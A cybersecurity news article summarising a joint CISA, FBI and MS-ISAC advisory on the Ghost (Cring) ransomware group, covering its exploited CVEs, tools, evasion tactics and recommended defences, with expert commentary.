U.S. federal authorities have warned about Ghost ransomware attacks targeting various industries, including critical infrastructure, in over 70 countries.
“Beginning early 2021, Ghost actors began attacking victims whose internet-facing services ran outdated versions of software and firmware,” the advisory stated.
The Cybersecurity and Infrastructure Agency (CISA), the Federal Bureau of Investigation (FBI), and the Multi-State Information Sharing and Analysis Center (MS-ISAC) jointly issued the security advisory.
The financially motivated Ghost ransomware group seems to be working out of China, a major shift from most cybercrime gangs originating from Russia.
Similarly, unlike most cyber attacks that leverage phishing, Ghost ransomware attacks exploit known and exploited vulnerabilities (KEV), some dating as back as early as 2009, more than fifteen years ago.
Ghost ransomware attacks leverage known exploited vulnerabilities to target numerous industries.
Ghost ransomware attacks leverage publicly available code to exploit common vulnerabilities and exposures (CVEs) to breach organizations that have not applied recommended patches.
Commonly exploited vulnerabilities include CVE-2018-13379, CVE-2010-2861, CVE-2009-3960, CVE-2021-34473, CVE-2021-34523, CVE-2021-31207. The group has also targeted vulnerable Fortinet VPNs by leveraging Fortinet FortiOS Path Traversal vulnerability CVE-2018-13379. Fortinet urged customers to patch the vulnerability numerous times between August 2019 and April 2021.
“Attacks on legacy cyber-physical, IoT, and IIoT devices – particularly in an OT environment – are to be expected and must be planned for as part of the operational requirements for the device,” noted Tim Mackey, Head of Software Supply Chain Risk Strategy at Black Duck. “Attackers know that best practices evolve and even the most secure device from a decade ago is likely quite vulnerable to a modern-day attack let alone those that may be mounted in the future.”
“Given that the usable life span of any cyber-physical device is measured in years, and potentially decades, organizations acquiring any such device should work closely with their suppliers to ensure a long-term operations and risk mitigation plan is created that covers not only [the] availability of patches, but [also] active sharing of threat scenario data,” added Mackey.
Tactics employed by the ransomware group
The Ghost ransomware team also uses various evasion tactics such as rotating their malware executables, changing encrypted file extensions, using different email addresses to demand ransom, and changing the contents of its ransom notes.
Similarly, it uses different names such as Cring, Crypt3r, Ghost, Hello, HsHarada, Phantom, Rapture, Strike, and Wickrme. Its malware executables also use different names such as Cring.exe, ElysiumO.exe, Ghost.exe, and Locker.exe. The ransomware group has also been observed using Mimikatz and CobaltStrike beacons and deploying payloads using legitimate Windows CertUtil certificates.
“Ghost actors often rely on built-in Cobalt Strike functions to steal process tokens running under the SYSTEM user context to impersonate the SYSTEM user often for the purpose of running Beacon a second time with elevated privileges,” the FBI stated.
They use Cobalt Strike to harvest login credentials including plaintext and hashed passwords and list running processes for potential compromise, such as knowing which antivirus is running to deactivate it. For example, most malware check whether Windows Defender is running to disable it.
“I see the use of Cobalt Strike by ransomware groups fairly common. If you’re not looking for and detecting Cobalt Strike instances, you’re just asking for trouble,” warned Roger Grimes, data-driven defense evangelist at KnowBe4.
Besides critical infrastructure, the Ghost ransomware attacks target healthcare, government, education, manufacturing, technology, and small and medium-sized businesses. However, Ghost ransomware attacks are indiscriminate without preferred targets.
“This indiscriminate targeting of networks containing vulnerabilities has led to the compromise of organizations across more than 70 countries, including organizations in China,” the agencies warned.
While the Ghost ransomware group threatens to sell stolen data, there is little evidence of that happening, suggesting a potential nation-state involvement.
Recommendations to mitigate ransomware attacks
Meanwhile, CISA has listed the threat actors’ tactics, techniques, and procedures (TTPs) and indicators of compromise (IOCs) to assist network defenders in securing their organizations.
The FBI, CISA, and MS-ISAC’s recommendations include regularly keeping updated offsite backups to quickly reconstruct the network case of a ransomware attack.
Other recommendations include patching operating systems, firmware, software, and security vulnerabilities as soon as they are discovered while focusing on the most targeted flaws. Network administrators should also segment networks to prevent lateral movement should threat actors gain access.
Lastly, system administrators should enforce phishing-resistant multi-factor authentication for privileged and email accounts to prevent takeovers if passwords are compromised.
“The Ghost ransomware campaign highlights the persistent reality that adversaries exploit known vulnerabilities faster than many organizations can patch them. This reinforces the critical need for proactive risk management – security leaders must ensure that software, firmware, and identity systems are continuously updated and hardened against exploitation,” concluded Darren Guccione, CEO and Co-Founder at Keeper Security.
